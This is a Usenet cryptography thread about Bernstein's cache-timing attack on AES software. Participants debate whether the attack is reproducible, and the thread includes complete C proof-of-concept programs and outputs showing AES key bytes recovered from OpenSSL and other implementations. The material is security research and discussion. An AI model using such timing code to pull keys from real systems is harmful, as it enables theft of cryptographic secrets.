---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago
Oh!! I'm very happy to be among the first to read such an awesome
announcement :-)
I'm afraid it will reactivate the debate from a few threads ago about "RC4
is not secure, AES is secure :-)"
Could you please detail what this changes "in practice" for AES users?
Arnaud
I've implemented your algo and got
b = 0, loops = 1024 79 22 134 157 179 174 41 242 217 86
b = 1, loops = 1024 165 243 71 220 200 98 206 224 72 183
b = 2, loops = 1024 136 249 77 147 238 75 78 126 208 206
b = 3, loops = 1024 173 175 61 19 141 173 203 161 114 223
b = 4, loops = 1024 219 111 39 202 206 100 129 119 10 60
b = 5, loops = 1024 64 92 163 92 144 21 154 136 131 23
b = 6, loops = 1024 218 147 228 193 232 97 60 229 228 229
b = 7, loops = 1024 6 129 81 224 108 145 44 252 32 140
b = 8, loops = 1024 190 16 30 211 238 64 235 231 29 76
b = 9, loops = 1024 211 47 71 78 87 63 67 18 40 181
b = 10, loops = 1024 232 107 14 55 158 68 234 253 86 192
b = 11, loops = 1024 31 143 206 106 47 126 159 177 54 110
b = 12, loops = 1024 234 114 124 22 217 162 203 189 145 62
b = 13, loops = 1024 208 72 100 200 119 78 34 123 144 130
b = 14, loops = 1024 134 250 191 171 186 208 151 4 197 33
b = 15, loops = 1024 215 158 18 58 208 43 81 208 180 143
On my AMD64 using LTC 0.99.
In particular, for the noted bytes 1, 5, and 9, only byte 5 really seems to
show a "bias", with 92 appearing twice [the probability of that, IIRC, is
roughly 43.61/65536, or 0.000665479]
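A quick way to check that figure, as a minimal sketch (the binomial model of
10 independent uniform bytes is my assumption about what is being computed
here):

#include <math.h>
#include <stdio.h>

/* Probability that one particular byte value appears exactly twice among
   10 independent uniform bytes: C(10,2) * (1/256)^2 * (255/256)^8. */
int main(void)
{
  double p = 45.0 * pow(1.0 / 256, 2) * pow(255.0 / 256, 8);
  printf("%g (= %g / 65536)\n", p, p * 65536);  /* ~0.000666, ~43.6/65536 */
  return 0;
}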
I don't quite get what you are trying to prove by this table [which
totally doesn't agree with your results]. A byte value that takes the
longest means what? There are 10 rounds in AES-128 and changing that
one byte will cause a difference in ALL 16 bytes after the second round
[compared to any other in the set].
I have put my source tarball for the demo at
http://libtomcrypt.org/djaes.tar.bz2
So far my initial assessment is the "bias" doesn't actually work or
isn't very practical.
Some things to note about my setup:
- Running Gentoo Linux on a 2.2GHz AMD64
- Used GCC 3.4.2-r1
- Had gaim, xmms, mozilla, Xdvi, Apache2, sshd, Gnome and applets running
- Linked in LibTomCrypt 0.99 [with patchset 001] using the shared object
Maybe if I shut down all active processes and un-niced it, it would work
better; who knows...
Tom
Question. Did you actually test his claim first?
> I'm afraid it will reactivate the debate from a few threads ago about "RC4
> is not secure, AES is secure :-)"
RC4 *isn't* secure. If DJ is right then AES is not secure either.
One doesn't influence the other.
> Could you please detail what this changes "in practice" for AES users?
Depends on whether others can confirm the results. So far on my AMD64 it
doesn't work.
[Note: this isn't the first "break" of AES that didn't work and I doubt
it will be the last. Not to say that people trying is bad. Quite the
opposite, it's good. Just jumping on the bandwagon without checking it out
is bad.]
Tom
Some other comments about the paper
- Salsa10 isn't a block cipher so comparing it to AES is meaningless
- << and >> are **not** "cheap" timing-independent operations on 8-bit CPUs
- He cites XTEA/Helix/SHA-256 as secure designs but doesn't prove or cite
proofs for this claim
- He fails to prove or state what Salsa10 is secure against
...
Tom
> Arnaud Carré wrote:
>
>> "D. J. Bernstein" <d...@cr.yp.to> a écrit dans le message de news:
>> slrncp7adr....@stoneport.math.uic.edu...
>>
>>> http://cr.yp.to/papers.html#cachetiming
>>
>> Oh!! I'm very happy to be among the first to read such an awesome
>> announcement :-)
>
>
> Question. Did you actually test his claim first?
>
>> I'm afraid it will reactivate the debate from a few threads ago about
>> "RC4 is not secure, AES is secure :-)"
>
>
> RC4 *isn't* secure. If DJ is right than AES is not secure either.
If I am reading this correctly, his claim is not that AES is insecure
but rather that particular _implementations_ of AES might be insecure
because they might leak key bits when subject to timing attacks.
Brian Gladman
More than that: I'm saying that _typical_ software implementations of
AES _do_ leak key bits to the simplest conceivable timing attack. The
underlying problem is that it's hard to do an S-box lookup in constant
time on modern CPUs.
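For a sense of what "constant time" costs here, one well-known workaround (a
minimal sketch of the general masking idea, not code from the paper) is to
read the entire table on every lookup and select the wanted entry without
branching:

#include <stdint.h>

/* Constant-time lookup of sbox[index]: touch every table entry and select
   the wanted one with a mask, so the sequence of memory accesses does not
   depend on the secret index.  Far slower than a direct load. */
static uint8_t ct_lookup(const uint8_t sbox[256], uint8_t index)
{
  uint8_t result = 0;
  unsigned int i;
  for (i = 0; i < 256; i++) {
    unsigned int diff = i ^ index;
    uint8_t mask = (uint8_t)((diff - 1u) >> 8);  /* 0xFF iff i == index */
    result |= (uint8_t)(sbox[i] & mask);
  }
  return result;
}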
I also did this separately and we seem to agree on what is involved.
I don't see the effect described in the paper either.
Brian Gladman
I don't see the attack as being practical and here is why.
Say you do two encryptions where you toggle byte k of the input [for
AES]. In round three, all bytes MUST be different between the two
16-byte blocks. It's then more plausible that they will "scatter"
throughout cache usage because all 16 bytes will now access different
parts of their respective 1kb arrays [though they could be on the same
page].
Also, AES only requires 4KB of tables, which are likely to stay in L1 or L2
because they're contiguous. I'd hazard a guess that in most crypto
implementations, on a CPU with enough cache for the OS + buffers + AES,
you're likely not to have that many cache misses after the first
few thousand blocks.
Not only that but you don't know when the cache miss occurs. Doesn't
tell you much about which lookups actually missed [because of the change
in input].
That, and the fact that neither Brian nor I can reproduce the results, doesn't
bode well for the attack. Perhaps you could post the source code you
ran, so we can check whether we implemented it wrong or you described it
wrong?
Tom
Yes, I agree that your claims are much wider than my comment here suggested.
But my aim in making a response to what Tom said was not to comment on
these wider issues but simply to avoid any suggestion that you are
claiming that the AES _algorithm_ is insecure when considered at an
abstract level.
Brian Gladman
My AES code was derived from the PD code by the Rijndael team that most
other sources use [GPG for instance uses it]. So unless D.J. found a
significantly new way to implement AES I suspect that he too uses the
same style implementation.
Also if his intention was to suggest that implementations ought to
tighten up then why would he propose Salsa10 as a "new methodology"?
I'm forming my own opinions on his motivations but I'll wait to see if
he'll post his test code before sharing them :-)
Tom
> BRG wrote:
>
>> D. J. Bernstein wrote:
>>
[snip]
> My AES code was derived from the PD code by the Rijndael team that most
> other sources use [GPG for instance uses it]. So unless D.J. found a
> significantly new way to implement AES I suspect that he too uses the
> same style implementation.
I have now run the tests using Paulo Barreto's AES code (this code was
used by DJB) as well as my own. I have done this on both Intel P3 and
P4 systems and cannot reproduce the results.
> Also if his intention was to suggest that implementations ought to
> tighten up then why would he propose Salsa10 as a "new methodology"?
>
> I'm forming my own opinions on his motivations but I'll wait to see if
> he'll post his test code before sharing them :-)
I remain to be convinced that this is as serious as DJB is suggesting.
Brian Gladman
Perhaps your variable alignments were lucky and avoided any overlaps in
the L1 cache; this won't happen in a large cryptographic program but it
could happen in a small test program. The more basic point is that the
timings depend heavily on the exact program you use, the compiler, and
the CPU.
Here's an example of 24 key bits leaking to the same trivial timing
attack in a few seconds on a Pentium M. I took Barreto's code, made an
easy translation from C++ to C, and ran
gcc -o time time.c barreto.c -O2
./time < /dev/urandom
with gcc 2.95.4 under FreeBSD 4.10. Output excerpt:
0, 64 loops: 114 10 83 65 235 62 76 144 65 8 200 37 35 14 150 39
1, 64 loops: 139 166 138 2 96 216 189 169 169 125 55 218 84 94 42 72
2, 64 loops: 127 96 211 151 186 194 194 202 237 252 251 102 200 127 31 39
3, 64 loops: 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76
4, 64 loops: 156 40 14 13 77 174 249 86 120 170 205 160 159 226 39 16
5, 64 loops: 24 189 115 81 106 101 108 107 50 199 25 240 168 85 49 156
6, 64 loops: 245 30 229 163 236 172 75 205 141 42 133 150 42 235 37 43
7, 64 loops: 79 105 173 50 201 79 38 14 115 192 43 40 222 175 52 26
8, 64 loops: 158 132 69 14 101 145 114 203 173 150 245 37 173 138 145 115
9, 64 loops: 127 94 80 118 234 15 199 197 86 80 122 51 36 23 59 45
10, 64 loops: 234 216 130 220 147 184 114 215 104 129 201 58 104 209 11 233
11, 64 loops: 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75
12, 64 loops: 110 102 182 214 82 202 109 108 133 94 37 95 66 158 152 66
13, 64 loops: 233 152 14 158 36 30 133 127 28 145 42 105 238 3 88 70
14, 64 loops: 150 7 2 142 47 142 17 117 58 96 208 34 113 191 231 183
15, 64 loops: 73 73 73 73 73 73 73 73 73 73 73 73 73 73 73 73
The time.c program is shown below.
---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago
#include <stdio.h>
#include <stdlib.h>   /* random() */

/* prototypes inferred from the calls below; the definitions live in
   barreto.c (the C translation of Barreto's AES code) */
extern void aes_expand(unsigned char *expanded, const unsigned char *key);
extern void aes_encrypt(unsigned char *out, const unsigned char *in,
                        const unsigned char *expanded);

typedef struct { unsigned long t[2]; } timing;

/* read the time stamp counter; .byte 15,49 is the rdtsc opcode */
#define timing_now(x) \
asm volatile(".byte 15;.byte 49" : "=a"((x)->t[0]),"=d"((x)->t[1]))
#define timing_diff(x,y) \
(((x)->t[0] - (double) (y)->t[0]) \
+ 4294967296.0 * ((x)->t[1] - (double) (y)->t[1]))

unsigned char expanded[176];
unsigned char out[16];
unsigned char key[16];
unsigned char in[16];

/* time one encryption, discarding obviously interrupted measurements */
int cycles(void)
{
  timing tstart;
  timing tend;
  int t;

  do {
    timing_now(&tstart);
    aes_encrypt(out,in,expanded);
    timing_now(&tend);
    t = timing_diff(&tend,&tstart);
  } while (t <= 0 || t >= 1500);
  return t;
}

int loops = 1;

/* return the value of input byte b that maximizes the total encryption time */
int bump(int b)
{
  int i;
  int j;
  int x;
  int xt;
  int bestx = 0;
  int bestxt = 0;

  for (x = 0;x < 256;++x) {
    xt = 0;
    for (i = 0;i < loops;++i) {
      for (j = 0;j < 16;++j) in[j] = random() >> 16;
      in[b] = x;
      xt += cycles() + cycles() + cycles();
    }
    if (xt > bestxt) {
      bestx = x;
      bestxt = xt;
    }
  }
  return bestx;
}

int main(void)
{
  int j;
  int k;
  int b;

  for (loops = 4;loops <= 65536;loops *= 2) {
    for (b = 0;b < 16;++b) {
      printf("%d, %d loops:",b,loops);
      for (k = 0;k < 16;++k) {
        for (j = 0;j < 16;++j) key[j] = getchar();  /* key bytes from stdin */
        aes_expand(expanded,key);
        printf(" %d",bump(b) ^ key[b]);   /* slowest input byte xor key byte */
        fflush(stdout);
      }
      printf("\n");
    }
  }
  return 0;
}
I am just a "random" programmer...
How much of a concern is this ?
I mean windows is multi threaded... all kinds of events happen all the time.
Doesn't this completely throw off all timings ?
Besides from that..... let's look at the following scenerio:
Computer 1 <-> Middle Man <-> Computer 2.
Now your the middle man...
You don't know what kind of hardware computer 1 and computer 2 are using...
Even if you did know you have no access to there timing etc...
How could you possible "crack" any protocol that is being used to
communicate
between Computer 1, Computer 2 and you in between lol.
I don't see it ;)
Can you ?
Bye,
Skybuck.
No. It adds a random-looking delay to some of the timings. The attacker
can simply ignore the unusually long timings. The attacker can also take
advantage of the delays to gain information about cache misses inserted
into the middle of the AES computation; this requires averaging over a
large number of timings, but it's doable.
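This filtering is essentially what the cycles() routines posted in this thread
already do with their "t >= 1500" check. As a standalone sketch (my own, not
from the paper) of discarding outliers and averaging the rest:

/* Keep only timings below a cutoff and average the rest, so occasional
   interrupts and scheduling delays mostly drop out of the estimate. */
double filtered_mean(const int *t, int n, int cutoff)
{
  double sum = 0.0;
  int i, kept = 0;
  for (i = 0; i < n; i++)
    if (t[i] > 0 && t[i] < cutoff) { sum += t[i]; kept++; }
  return kept ? sum / kept : 0.0;
}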
> How could you possibly "crack" any protocol that is being used to
> communicate between Computer 1, Computer 2 and you in between, lol.
My paper cites the Brumley-Boneh paper ``Remote timing attacks are
practical,'' which you obviously need to read.
Do you happen to have link to a PDF document or html file ?
Bye,
Skybuck.
Often it tells you the corresponding key byte, because---for example---
the xor of those bytes, which is used as a round-1 S-box index, incurs
an L1 cache miss. If you know how the cache works and where the program
stores its variables, you can figure out which xor values will trigger
this behavior; or you can see the values from a trivial test, as I did.
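In other words (an illustration with hypothetical names, not code from the
paper): if table index slow_index is the one known to incur the miss, and
x_max is the value of input byte b that maximizes the timing, then the
round-1 index was x_max ^ key[b] == slow_index, so:

/* recover key byte b from the slow table index and the slowest input value */
unsigned char recover_key_byte(unsigned char x_max, unsigned char slow_index)
{
  return x_max ^ slow_index;
}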
% gcc -o time time.c -lssl -lcrypto -O2
% ./time < /dev/urandom
...
2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
...
10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
...
14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85
The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
dependence, omitting -O2 changes the constants to 86, 97, and 93.
Anyway, the complete time.c code appears below.
---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago
#include <stdio.h>
#include <stdlib.h>
#include <openssl/aes.h>
typedef struct { unsigned long t[2]; } timing;
#define timing_now(x) \
asm volatile(".byte 15;.byte 49" : "=a"((x)->t[0]),"=d"((x)->t[1]))
#define timing_diff(x,y) \
(((x)->t[0] - (double) (y)->t[0]) \
+ 4294967296.0 * ((x)->t[1] - (double) (y)->t[1]))
AES_KEY expanded;
unsigned char out[16];
unsigned char key[16];
unsigned char in[16];
int cycles(void)
{
  timing tstart;
  timing tend;
  int t;
  do {
    timing_now(&tstart);
    AES_encrypt(in,out,&expanded);
    timing_now(&tend);
    t = timing_diff(&tend,&tstart);
  } while (t <= 0 || t >= 1500);
  return t;
}
int loops = 1;
/* bump() and main() are the same as in the earlier time.c, except that the
   key schedule is set up with AES_set_encrypt_key(key,128,&expanded). */
Right. An AES oracle---a magic box that, given n, prints AES_k(n)
exactly one time step later---is, as far as we know, indistinguishable
from an oracle for a uniform random permutation.
The problem is that real-world S-box lookups don't take constant time,
so real-world AES software doesn't take exactly one time step.
The paper spends a couple of pages explaining how expensive it is to
avoid the four most obvious sources of variability in S-box timing. If
you ever manage to write an AES implementation that doesn't have
input-dependent timings, feel free to tell us exactly how slow it is.
> then why would he propose Salsa10 as a "new methodology"?
I didn't call it a ``new methodology.'' In fact, I said quite clearly
that it follows TEA and SHA-256 and Helix. Of course, the 64-byte output
is different, and various details are different; the objective, as
usual, is to find the highest-speed system that we can still reasonably
conjecture to be unbreakable.
>Tom St Denis wrote:
>> A byte value that takes the longest means what?
>
>Often it tells you the corresponding key byte, because---for example---
>the xor of those bytes, which is used as a round-1 S-box index, incurs
>an L1 cache miss. If you know how the cache works and where the program
>stores its variables, you can figure out which xor values will trigger
>this behavior; or you can see the values from a trivial test, as I did.
I can see that S-boxes do have a potential of allowing side attacks,
given what you say here, although in some applications the attacker
doesn't have this opportunity, and only sees the enciphered messages.
But not using S-boxes, and depending entirely on functions that can be
calculated quickly, is very likely to create cryptanalytically
exploitable weaknesses in ciphers.
Security is not enhanced if so many conditions are set on what
constitutes an acceptable cipher that it becomes too difficult for
anyone ever to design one that is secure. If ciphers are only designed
for us by the high priests of mathematics, then we are forced to trust
them.
The first rule of security is to trust no one.
For some purposes, a cipher is needed that resists all side attacks. For
others, this is not a requirement. As long as the restrictions applying
to each class of cipher are recognized, a toolkit letting people who wish
to communicate by e-mail, and who are concerned only about distant
eavesdroppers, construct their very own basic-class cipher may serve a
purpose.
Finding ciphers using just multiplication for nonlinearity is also a
valid pursuit, because applications exist requiring side attack
resistance. But the idea that there should only be one cipher, and it
should be all things to all men, is not a good one; Terry Ritter made
valid points about the dangers of staying with the herd (although the
dangers of going too far astray, and using a cipher about whose security
nothing is known, are also valid).
John Savard
http://home.ecn.ab.ca/~jsavard/index.html
> Here's another example. The same easy timing attack, applied to OpenSSL
> under FreeBSD 4.10 on a Pentium M, immediately finds 24 AES key bits:
>
> % gcc -o time time.c -lssl -lcrypto -O2
> % ./time < /dev/urandom
> ...
> 2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
> ...
> 10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
> ...
> 14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85
>
> The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
> dependence, omitting -O2 changes the constants to 86, 97, and 93.
> Anyway, the complete time.c code appears below.
Thank you for the code. I have had to modify this for Windows and
Microsoft VC++ (7.1) and my revision is included below for those who
might want to try this out.
After trying various combinations of AES tables I have not been able to
obtain any effects on either Intel P4 or VIA C3 processors.
But I have now found combinations of tables (using my AES code) that do
demonstrate the effect on the Intel P3 processor. Here is one P3 result
(the far right hand value is the duplicate count from 16 samples):
08, 00004 loops : 14 18 1f 37 3a 45 4d 4d 65 7c 8f a3 c8 e7 eb f7
11, 00004 loops : 18 18 22 3a 3a 3a 3a 3a 3a 41 48 84 ae c5 d7 e8 6
12, 00004 loops : 1d 1d 27 37 38 3b 3d 5e 5e 91 a2 ac b0 bd ce d4
01, 00008 loops : 2a 49 49 4b 74 77 7d 8d 91 9d 9f a8 da db f7 fb
05, 00008 loops : 07 2c 3c 46 51 58 5a 77 79 92 92 9e cd ec fc fe
08, 00008 loops : 03 13 17 17 2e 46 69 6c 76 80 8f 95 b3 e2 e6 f6
10, 00008 loops : 0f 10 16 33 3a 45 52 72 72 86 9c a3 c8 d5 f5 fa
11, 00008 loops : 3a 3a 40 68 81 9c a8 b6 c9 cf d0 d9 da ea ea f5
12, 00008 loops : 31 3c 4d 7e 81 90 99 a2 b4 b4 c5 c6 c8 c8 d1 ec
00, 00016 loops : 13 14 26 2a 37 48 52 6a 76 92 b5 c4 d6 fa fb fb
01, 00016 loops : 08 0c 2f 32 33 3e 4c 52 52 62 65 8e 9b aa ae ec
03, 00016 loops : 07 3c 47 55 67 68 7c 9c a1 d1 d6 ed f2 f8 f8 fa
04, 00016 loops : 05 05 05 0c 14 18 25 29 45 48 49 59 81 96 b0 c2 3
11, 00016 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 67 9c c6 f7 12
13, 00016 loops : 0a 69 69 6b 73 78 8e a2 af b4 bd c6 d2 dd ee ef
15, 00016 loops : 19 2e 35 3e 3e 44 46 52 8f 90 a2 b3 c4 e7 ed f0
01, 00032 loops : 1e 40 54 57 5d 6d a6 a7 b4 b8 b8 d5 d9 ee f0 fe
06, 00032 loops : 09 17 31 46 52 72 78 96 97 a2 b7 df e0 e0 ef fb
11, 00032 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 63 74 a0 bd d6 11
15, 00032 loops : 0e 1b 2c 35 3e 3e 3e 3e 59 63 77 83 88 94 b5 df 4
01, 00064 loops : 5e 6a 7e 7f 85 86 8b 8f 9f 9f a2 a5 d5 d9 df f7
07, 00064 loops : 05 10 15 17 2d 5f 6f 71 8b 91 ba c3 d4 ef ef fd
11, 00064 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 7e c1 c4 13
12, 00064 loops : 18 19 19 34 34 37 58 58 85 a3 a5 af ce dc df ee
15, 00064 loops : 0f 1c 24 31 3e 3e 3e 3e 56 63 65 7a 80 8e de e3 4
00, 00128 loops : 00 1b 21 45 4d 5c 60 84 96 9e 9e a6 bc cd db f7
01, 00128 loops : 0a 21 62 72 7d 8d 8d 8f 93 af b0 c5 d8 e1 e2 fc
02, 00128 loops : 01 2b 33 37 49 4a 4e 50 53 93 a0 dc ea ea ed f2
03, 00128 loops : 08 18 19 1b 24 2e 31 3a 3d 50 5e 85 ad c9 f8 f8
06, 00128 loops : 26 26 2a 37 59 5c 7c 7e a0 ba c5 c8 e2 e6 f1 fa
07, 00128 loops : 2e 37 4b 5d 70 72 75 87 9e a5 bd c5 c5 d8 e7 fe
09, 00128 loops : 2b 33 4b 4b 53 54 59 5f 70 70 92 94 97 98 af f9
10, 00128 loops : 2d 2e 4e 53 60 64 8d 91 a1 a1 b3 c2 e0 ed f9 ff
11, 00128 loops : 0e 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 8f bf c0 12
14, 00128 loops : 05 05 08 3b 4f 5d 69 6a 7a 8c ab cc ef ef f0 f8
15, 00128 loops : 07 13 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 8d 98 e4 f4 10
03, 00256 loops : 36 40 51 6b 75 8b 8b 98 a1 ac b5 e6 ec f3 fa fc
04, 00256 loops : 0a 16 30 50 65 6f 71 79 94 a2 a6 d2 d2 db e5 fd
05, 00256 loops : 02 08 17 17 1d 42 50 6a 84 c6 d8 dc e5 f6 f8 f9
06, 00256 loops : 1e 22 2c 44 51 5a 64 87 8b 9e a0 a0 b0 bc e3 ff
09, 00256 loops : 25 27 27 58 5c 84 9b 9f a9 de e2 e8 ee f2 f7 fa
11, 00256 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 5c 96 96 13
13, 00256 loops : 02 30 46 49 4e 58 7a 7e 89 95 a1 a3 a3 b0 dc ef
14, 00256 loops : 2c 32 32 3c 3d 4b 61 8b 92 b1 c2 e0 e9 eb ed ef
15, 00256 loops : 2f 3d 3e 3e 3e 3e 3e 3e 3e 3e 3e 6e 74 c6 e2 ea 9
02, 00512 loops : 04 11 38 65 70 75 7e 97 a5 ba ba dc dd e6 fd fe
04, 00512 loops : 0e 0e 38 44 56 66 67 6b 80 a9 aa bd bd ca d4 d7
05, 00512 loops : 01 3b 46 4b 59 66 6f 84 85 89 99 be c6 c7 d5 d5
08, 00512 loops : 07 18 1c 27 27 2a 4a 4b 64 72 8b 93 aa d4 e1 e5
11, 00512 loops : 11 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 67 14
14, 00512 loops : 1c 29 2f 4f 5c 60 6c 7c 83 83 a0 a5 c3 dd f4 f8
15, 00512 loops : 22 34 36 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 73 9b b5 10
Brian Gladman
-------------------------------------
/* Based on D. J. Bernstein's Timing Attack Code modified for
Brian Gladman's AES code and Microsoft VC++ version 7.1
*/
#include <stdio.h>
#include <stdlib.h>
#include "aes.h"
/* obtain cycle counts using the Time Stamp Counter */
#define timing_now(x) \
__asm rdtsc __asm lea ebx,x __asm mov [ebx],eax __asm mov [ebx+4],edx
#define timing_diff(x,y) (int)(x - y)
#define N_SAMPLES 16
unsigned char out[16];
unsigned char key[16];
unsigned char in[16];
aes_encrypt_ctx ctx[1];
/* Simple PRNG combining 2 of George Marsaglia's generators */
unsigned long rand32(void)
{ static unsigned long w = 521288629, z = 362436069;
z = 36969 * (z & 65535) + (z >> 16);
w = 18000 * (w & 65535) + (w >> 16);
return (z << 16) + w;
}
unsigned char rand8(void)
{ static unsigned long r4, cnt = 4;
if(cnt == 4)
r4 = rand32(), cnt = 0;
return (unsigned char)(r4 >> 8 * cnt++);
}
int cycles(void)
{ unsigned long long tstart, tend;
int t;
do
{ timing_now(tstart);
aes_encrypt(in, out, ctx);
timing_now(tend);
t = timing_diff(tend, tstart);
}
while
(t <= 0 || t >= 1500);
return t;
}
int bump(int b, int loops)
{ int i, j, x, xt, bestx, bestxt = 0;
for(x = 0; x < 256; ++x)
{ xt = 0;
for(i = 0; i < loops; ++i)
{
for(j = 0; j < 16; ++j)
in[j] = rand8();
in[b] = x;
xt += cycles() + cycles() + cycles();
}
if(xt > bestxt)
{
bestx = x; bestxt = xt;
}
}
return bestx;
}
/* comparison function with the const void * signature that qsort expects */
int cmp(const void* pa, const void* pb)
{
const unsigned char a = *(const unsigned char*)pa, b = *(const unsigned char*)pb;
return a < b ? -1 : a > b ? 1 : 0;
}
int main(void)
{ int i, j, k, b, loops, cnt;
unsigned char v[16];
for(loops = 4; loops <= 65536; loops += loops)
{ for(b = 0; b < 16; ++b)
{ for(k = 0; k < N_SAMPLES; ++k)
{ for(j = 0; j < 16; ++j)
key[j] = rand8();
aes_encrypt_key(key, 16, ctx);
v[k] = bump(b, loops) ^ key[b];
}
qsort(v, N_SAMPLES, sizeof(unsigned char), cmp);
j = 0; cnt = 0;   /* find the longest run of equal values in the sorted samples */
do
{ if(v[j] == v[j + 1])
{ k = j;
while(++j < N_SAMPLES && v[j] == v[k])
;
cnt = (j - k > cnt ? j - k : cnt);
--j;
}
}
while
(++j < N_SAMPLES - 1);   /* avoid reading past the end of v[] */
if(cnt > 1)
{ printf("\n%02d, %05d loops :", b, loops);
for(i = 0; i < N_SAMPLES; ++i)
printf(" %02x", v[i]);
if(cnt > 2)
printf(" %2d", cnt);
fflush(stdout);
}
}
}
return 0;
}
I found a string of "243" with his code [slightly modified to be more
x86 portable asm...] in byte 1, but when I put in my rdtsc function
[from my djaes code] I got strings of 245. So clearly what value that
pops out is dependent on the analysis software cuz both can't be right.
So the question now is why doesn't my AES code leak bytes too? My code
is fairly fast [17 cycles/byte on an AMD64] for C code and is based off
the Rijndael teams "fast-alg" code.
I'm going to look at the SSL AES code and see if I can spot major
differences.
Tom
> http://cr.yp.to/papers.html#cachetiming
Interesting.
When you say that you 'reliably' leak 24 bits (bytes 1,5,9)
the third byte isn't 100% reliable, having 2 non-135 values.
I notice that the lowest bit of byte 0 is 0 for all but 2
of the values in your table. Is that statistically significant,
and if so would you consider it equally fair to say that that
particular implementation reliably leaked 25 bits, not 24?
(And by extension, some of the implementations that appear
to be leaking fewer bits might also be leaking more than they
first appear to.)
Is there any reason why AES implementations shouldn't also be
capable of leaking relations between bits even if they don't
leak explicit bits?
Phil
--
They no longer do my traditional winks tournament lunch - liver and bacon.
It's just what you need during a winks tournament lunchtime to replace lost
... liver. -- Anthony Horton, 2004/08/27 at the Cambridge 'Long Vac.'
> BRG wrote:
[snip]
>>
>>
>> Thank you for the code. I have had to modify this for Windows and
>> Microsoft VC++ (7.1) and my revision is included below for those who
>> might want to try this out.
>>
>> After trying various combinations of AES tables I have not been able
>> to obtain any effects on either Intel P4 or VIA C3 processors.
>
> I found a string of "243" with his code [slightly modified to use more
> portable x86 asm...] in byte 1, but when I put in my rdtsc function
> [from my djaes code] I got strings of 245. So clearly which value
> pops out depends on the analysis software, because both can't be right.
>
> So the question now is why doesn't my AES code leak bytes too? My code
> is fairly fast [17 cycles/byte on an AMD64] for C code and is based on
> the Rijndael team's "fast-alg" code.
Since most fast AES software works in a similar way, it is unlikely that
the effect is present in some implementations and not in others.
But the effect is very dependent on setting up the AES tables in a way
that invokes specific cache behaviour.
If timing attacks are a concern, much smaller tables can be used. I
don't see the effect on any processors when AES is implemented with
small tables (this reduces the speed by a factor of about 2).
Brian Gladman
Salsa10 looks like an improved version of slash [2], with
better parallelizability of operations, and fewer operations (5/8);
also notable are a "butterfly" diffusion schedule, and a more
irregular structure (randomized rotation constants, randomized
choice between add-then-xor or xor-then-add, and an additive
value that changes across rounds).
I guess DJB has some theory, or at least a justifiable rule of
thumb, to decide the number of operations. Designers of SHA-x faced
the same issue. But neither had the gu^K^K^K imprudence to state it.
Any pointer to solid theory on the security level of this sort
of construct? E.g., most importantly, the effect of the number
of operations on differential/linear/impossible/unamit cryptanalysis?
And/or on the need for some amount of irregularity in the structure?
TIA,
Francois Grieu
[1] Daniel J. Bernstein: Cache-timing attacks on AES
<http://cr.yp.to/antiforgery.html#cachetiming>
<http://cr.yp.to/antiforgery/cachetiming-20041111.pdf>
[2] post on sci.crypt.research circa 2004-09-07
article <2q4o33F...@uni-berlin.de>
<http://google.com/groups?as_umsgid=2q4o33F...@uni-berlin.de>
True. But the 135 becomes solid when the number of loops increases.
> I notice that the lowest bit of byte 0 is 0 for all but 2
> of the values in your table. Is that statistically significant,
Could be random. I didn't look for (and am not planning to look for)
further patterns; 24 leaked key bits is already unacceptable.
If you want to try extracting the entire key, you could look for more
patterns in the timings, or you could arrange for different sets of
variables to be touched before the AES call.
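As a rough sketch of what "touching different variables" could look like (my
own illustration; the buffer size, stride, and cache parameters are
assumptions, not from the paper): before each timed encryption, walk a buffer
whose lines compete with the AES tables for the cache.

#define EVICT_BYTES 32768   /* assumed to be comparable to the L1 data cache */
#define LINE 64             /* assumed cache-line size */
static volatile unsigned char evict[EVICT_BYTES];

/* bring the lines covering [offset, offset+span) into the cache, so that a
   chosen slice of the cache is "dirty" before the AES call is timed */
static void touch_before_aes(int offset, int span)
{
  int i;
  for (i = offset; i < offset + span && i < EVICT_BYTES; i += LINE)
    evict[i]++;
}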
So? If you can get your hands on the physical computer and the software that
is running on it, you can get the key anyway (read it from memory,
etc.). Of course you have to do the actual encryptions in a secure
environment, because if you can't control the computer that runs them, you
are screwed anyway.
--
My computer security & privacy related homepage
http://www.markusjansson.net
Use HushTools or GnuPG/PGP to encrypt any email
before sending it to me to protect our privacy.
The attack doesn't read the key from memory. What it reads is the time
taken to compute AES_k(n) for selected values of n. It easily figures
out some key bytes from those timings.
Is there any impact on this approach working on systems with more than
one processor (SMP or dual core) or with "virtual CPUs" (hyperthreading)
as opposed to a conventional UP system? How about the effects of other
application loads on a multitasking system impacting the results?
--
Randy Howard (2reply remove FOOBAR)
I ran the time.c program along with the 6 AES implementations present in
aesbench.tgz (devine, gladman, mks, openssl, gpg, tom), on several
machines, one of them is a dual Celeron 560. Patterns also appear on this
machine.
The "worst" case was the "devine" implementation on a Pentium III. 50% of
the key bytes showed a repetitive pattern.
--
Erwann ABALEA <erw...@abalea.com> - RSA PGP Key ID: 0x2D0EABD5
Does anyone have any estimates for how many queries might be required?
It all comes down to the S/N ratio; does anyone have any information on
how large a bias the timing variability causes?
Does anyone know of an example of an AES implementation that can be
